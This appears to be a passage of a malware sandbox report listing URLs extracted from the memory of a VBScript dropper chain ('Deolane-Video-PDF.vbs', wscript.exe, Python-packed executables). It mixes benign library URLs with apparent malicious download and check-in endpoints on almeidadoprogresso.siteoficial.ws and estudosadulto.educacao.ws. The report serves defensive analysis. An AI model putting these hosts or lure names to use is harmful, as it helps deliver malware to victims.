Source: bOamY.exe, 00000010.00000002.3388628047.000001E4F5F80000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2366556162.000001E4F5FF7000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2366394449.000001E4F5FD5000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B967B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F66A5000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96D80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.python.org/
Source: bOamY.exe, 0000000F.00000003.2346180654.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3388330066.000001E4F5E80000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2432559155.0000014CAE215000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388330346.0000018B966B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.python.org/dev/peps/pep-0205/
Source: bOamY.exe, 00000010.00000002.3387394265.000001E4F5A90000.00000004.00001000.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2361557371.000001E4F3BA2000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3387213540.0000018B962D0000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2447311226.0000018B944AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F66A5000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96F8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps
Source: registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96F8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps-
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F66A5000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96F8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: bOamY.exe, 00000010.00000002.3388628047.000001E4F6093000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96D80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wwwsearch.sf.net/):
Source: bOamY.exe, 00000010.00000002.3387729278.000001E4F5C50000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3388628047.000001E4F6093000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3385491392.0000018B94492000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B968D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://yahoo.com/
Source: wscript.exe, 00000004.00000003.2284944729.0000025E7AEC9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2282766922.0000025E7AEB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2292217896.0000025E7AECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2284628758.0000025E7AEBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://almeidadoprogresso.siteoficial.ws/
Source: wscript.exe, 00000004.00000003.2284628758.0000025E7AEBB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2292008975.0000025E7AEA2000.00000004.00000020.00020000.00000000.sdmp, Deolane-Video-PDF.vbs String found in binary or memory: https://almeidadoprogresso.siteoficial.ws/wsx.zip
Source: wscript.exe, 00000004.00000002.2292377810.0000025E7AF25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2282959509.0000025E7AF23000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2282766922.0000025E7AF18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://almeidadoprogresso.siteoficial.ws:443/wsx.zip-0
Source: bOamY.exe, 00000010.00000002.3389476883.000001E4F6260000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3389461546.0000018B96A90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://cloud.google.com/appuser/docs/standard/runtimes
Source: bOamY.exe, 0000000F.00000003.2348682422.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434954846.0000014CAE216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://codecov.io/github/pyca/cryptography/coverage.svg?branch=master
Source: bOamY.exe, 0000000F.00000003.2348682422.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434954846.0000014CAE216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://codecov.io/github/pyca/cryptography?branch=master
Source: bOamY.exe, 0000000F.00000003.2348682422.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434954846.0000014CAE216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cryptography.io
Source: bOamY.exe, 0000000F.00000003.2348682422.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434954846.0000014CAE216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cryptography.io/
Source: bOamY.exe, 0000000F.00000003.2348682422.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434954846.0000014CAE216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cryptography.io/en/latest/installation.html
Source: bOamY.exe, 0000000F.00000003.2348682422.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434954846.0000014CAE216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cryptography.io/en/latest/security.html
Source: _bcrypt.pyd.23.dr String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: bOamY.exe, 00000010.00000002.3391793141.000001E4F6B80000.00000004.00001000.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3392174647.000001E4F6DA0000.00000004.00001000.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3391987991.000001E4F6C90000.00000004.00001000.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3391480634.000001E4F69D0000.00000004.00001000.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3388628047.000001E4F5F60000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B96790000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391277503.0000018B97200000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391611067.0000018B973B0000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391973690.0000018B975D0000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391777453.0000018B974C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://estudosadulto.educacao.ws/contador/contador.php
Source: registry_4131f52c.exe, 00000018.00000002.3391973690.0000018B975D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://estudosadulto.educacao.ws/contador/contador.phpP
Source: bOamY.exe, 00000010.00000002.3392174647.000001E4F6DA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://estudosadulto.educacao.ws/contador/contador.phpp
Source: wscript.exe, wscript.exe, 00000004.00000003.2234147620.0000025E7C8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2206425138.0000025E7E53E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2213259348.0000025E7C8BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2292897061.0000025E7C8D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2283665060.0000025E7C8BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2233586650.0000025E7C8B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://estudosadulto.educacao.ws/deola
Source: wscript.exe, 00000000.00000003.2090353245.000002892EA2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090407063.000002892CD21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085472790.000002892EA2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090647951.000002892CCFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2091089153.000002892CD00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085406616.000002892EA2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2234147620.0000025E7C8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2091015060.0000025E7C8BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2284944729.0000025E7AEC9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2213259348.0000025E7C8BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2283405224.0000025E7AE97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2282766922.0000025E7AEB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2285623678.0000025E7AEAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2283665060.0000025E7C8BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2286465373.0000025E7AE9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2284628758.0000025E7AEB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2292217896.0000025E7AECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2233586650.0000025E7C8B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2091111618.0000025E7C8BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2284628758.0000025E7AEBB000.00000004.00000020.00020000.00000000.sdmp, Deolane-Video-PDF.vbs String found in binary or memory: https://estudosadulto.educacao.ws/deolane.mp4
Source: wscript.exe, 00000004.00000003.2284944729.0000025E7AEC9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2282766922.0000025E7AEB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2292217896.0000025E7AECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2284628758.0000025E7AEBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://estudosadulto.educacao.ws/deolane.mp4#
Source: wscript.exe, 00000000.00000003.2090353245.000002892EA2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085472790.000002892EA2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085406616.000002892EA2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2234147620.0000025E7C8B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2091015060.0000025E7C8BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2213259348.0000025E7C8BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2283665060.0000025E7C8BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2233586650.0000025E7C8B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2091111618.0000025E7C8BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://estudosadulto.educacao.ws/deolane.mp4C=N
Source: wscript.exe, 00000000.00000003.2085458015.000002892CF7A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2091076043.0000025E7B0DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://estudosadulto.educacao.ws/deolane.mp4rro:
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F66A5000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96EE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: bOamY.exe, 00000010.00000003.2352281643.000001E4F3B5B000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352814825.000001E4F3B44000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352281643.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352598728.000001E4F3B44000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352598728.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352053618.000001E4F3B5B000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2351565794.000001E4F3B5C000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352053618.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352814825.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2351835969.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2351565794.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3385498400.000001E4F3AE0000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2351835969.000001E4F3B5C000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2444925492.0000018B9449B000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2446105109.0000018B94467000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3387683287.0000018B964D0000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2447032419.0000018B94495000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3385491392.0000018B943EE000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2445030194.0000018B94495000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2446105109.0000018B94495000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2445117297.0000018B94495000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: bOamY.exe, 00000010.00000002.3391691346.000001E4F6B00000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391518659.0000018B97330000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/asweigart/pyperclip/issues/55
Source: bOamY.exe, 0000000F.00000003.2345919215.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344106496.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2432144564.0000014CAE215000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2430058140.0000014CAE215000.00000004.00000020.00020000.00000000.sdmp, pywintypes38.dll.23.dr, pywintypes38.dll.15.dr String found in binary or memory: https://github.com/mhammond/pywin32
Source: bOamY.exe, 00000010.00000002.3391691346.000001E4F6B00000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391518659.0000018B97330000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/psf/requests/pull/6710
Source: _bcrypt.pyd.23.dr String found in binary or memory: https://github.com/pyca/bcrypt/__version_ex__4.2.0The
Source: bOamY.exe, 0000000F.00000003.2348682422.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434954846.0000014CAE216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pyca/cryptography
Source: bOamY.exe, 0000000F.00000003.2348682422.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434954846.0000014CAE216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
Source: bOamY.exe, 0000000F.00000003.2348682422.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434954846.0000014CAE216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pyca/cryptography/issues
Source: bOamY.exe, 0000000F.00000003.2348682422.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434954846.0000014CAE216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=master
Source: bOamY.exe, 00000010.00000003.2352281643.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352598728.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352053618.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352814825.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2351835969.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3386704746.000001E4F54F0000.00000004.00001000.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2351565794.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2444925492.0000018B9449B000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2447032419.0000018B94495000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2445030194.0000018B94495000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2446105109.0000018B94495000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2445117297.0000018B94495000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3386456770.0000018B95D20000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2444238957.0000018B94495000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2446726637.0000018B94495000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2445704982.0000018B94495000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: registry_4131f52c.exe, 00000018.00000003.2445704982.0000018B94495000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: bOamY.exe, 00000010.00000003.2352281643.000001E4F3B5B000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352814825.000001E4F3B44000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352281643.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352598728.000001E4F3B44000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352598728.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352053618.000001E4F3B5B000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2351565794.000001E4F3B5C000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352053618.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352814825.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2351835969.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2351565794.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3385498400.000001E4F3AE0000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2351835969.000001E4F3B5C000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2444925492.0000018B9449B000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2446105109.0000018B94467000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3387683287.0000018B964D0000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2447032419.0000018B94495000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3385491392.0000018B943EE000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2445030194.0000018B94495000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2446105109.0000018B94495000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2445117297.0000018B94495000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: bOamY.exe, 00000010.00000003.2352281643.000001E4F3B5B000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352814825.000001E4F3B44000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352281643.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352598728.000001E4F3B44000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352598728.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352053618.000001E4F3B5B000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2351565794.000001E4F3B5C000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352053618.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2352814825.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2351835969.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2351565794.000001E4F3B88000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3385498400.000001E4F3AE0000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2351835969.000001E4F3B5C000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2444925492.0000018B9449B000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3385491392.0000018B94492000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2446105109.0000018B94467000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3387683287.0000018B964D0000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2447032419.0000018B94495000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3385491392.0000018B943EE000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2445030194.0000018B94495000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000003.2446105109.0000018B94495000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: bOamY.exe, 00000010.00000002.3388628047.000001E4F6093000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B968D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: registry_4131f52c.exe, 00000018.00000002.3389597117.0000018B96B10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/497
Source: bOamY.exe, 00000010.00000002.3385498400.000001E4F3B81000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3387683287.0000018B96575000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B968D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/
Source: registry_4131f52c.exe, 00000018.00000002.3388225423.0000018B96650000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B967B0000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B968D2000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96DAC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/get
Source: bOamY.exe, 00000010.00000003.2366518146.000001E4F5D0D000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3387729278.000001E4F5C50000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2366243913.000001E4F5CF0000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3387683287.0000018B965B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/post
Source: bOamY.exe, 0000000F.00000003.2348682422.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434954846.0000014CAE216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F66A5000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96D80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mahler:8092/site-updates.py
Source: bOamY.exe, 0000000F.00000003.2348682422.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434954846.0000014CAE216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
Source: bOamY.exe, 00000010.00000002.3391645729.000001E4F6AC0000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391456544.0000018B972F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://pyperclip.readthedocs.io/en/latest/index.html#not-implemented-error
Source: bOamY.exe, 0000000F.00000003.2348682422.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434954846.0000014CAE216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pypi.org/project/cryptography/
Source: bOamY.exe, 0000000F.00000003.2348682422.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434954846.0000014CAE216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
Source: bOamY.exe, 00000010.00000003.2366518146.000001E4F5D0D000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3387729278.000001E4F5C50000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3391645729.000001E4F6AC0000.00000004.00001000.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2366243913.000001E4F5CF0000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3387683287.0000018B965B6000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391456544.0000018B972F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://requests.readthedocs.io
Source: bOamY.exe, 00000010.00000002.3391691346.000001E4F6B00000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391518659.0000018B97330000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/questions/18905702/python-ctypes-and-mutable-buffers
Source: bOamY.exe, 00000010.00000002.3391691346.000001E4F6B00000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391518659.0000018B97330000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/questions/455434/how-should-i-use-formatmessage-properly-in-c
Source: bOamY.exe, 00000010.00000002.3387729278.000001E4F5C50000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3387683287.0000018B964D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
